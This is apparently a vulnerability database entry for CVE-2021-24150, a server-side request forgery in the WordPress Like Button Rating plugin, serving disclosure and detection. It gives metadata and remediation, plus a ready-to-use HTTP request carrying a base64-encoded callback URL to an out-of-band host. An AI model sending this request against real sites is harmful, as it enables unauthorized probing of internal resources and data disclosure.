🔙 목록으로 돌아가기

CVE-2021-24150: WordPress Like Button Rating <2.6.32 - Server-Side Request Forgery

TitleWordPress Like Button Rating <2.6.32 - Server-Side Request Forgery
Authortheamanrawat
SeverityHigh
ImpactAn attacker can exploit this vulnerability to make requests to internal resources, potentially leading to unauthorized access or information disclosure.
RemediationUpdate the WordPress Like Button Rating plugin to version 2.6.32 or later.
CVSS Score7.5
EPSS Score0.41724
CVE IDCVE-2021-24150
CWE IDCWE-918
Tags cve2021 cve wordpress wp-plugin wp ssrf wpscan unauth likebtn-like-button likebtn-like-button_project vuln

🔍 Vulnerability Description

WordPress Like Button Rating plugin before 2.6.32 is susceptible to server-side request forgery. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q=aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=" HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-24150.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-24150.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A